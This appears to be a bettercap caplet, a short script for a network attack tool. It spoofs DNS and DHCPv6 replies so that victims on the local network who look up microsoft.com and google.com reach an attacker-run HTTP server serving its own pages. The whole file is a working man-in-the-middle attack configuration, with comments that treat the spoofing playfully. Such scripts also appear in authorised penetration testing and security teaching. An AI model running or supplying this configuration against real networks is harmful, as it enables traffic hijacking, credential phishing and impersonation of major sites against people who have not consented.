# Let's spoof Microsoft and Google ^_^
set dns.spoof.domains microsoft.com,google.com
set dhcp6.spoof.domains microsoft.com,google.com

# Every HTTP request to the spoofed hosts will come to us
# Let's give them some contents
set http.server.path caplets/html

# Check who's alive on the network
net.recon on

# Serve files
http.server on

# Redirect DNS requests by spoofing DHCPv6 packets
dhcp6.spoof on

# Send spoofed DNS replies ^_^
dns.spoof on

# Set a custom prompt for IPv6
set prompt {by}{fw}{cidr} {reset}{bold}»{reset} {fb}>{env.iface.ipv4}

# Clear the events buffer and the screen
events.clear
clear
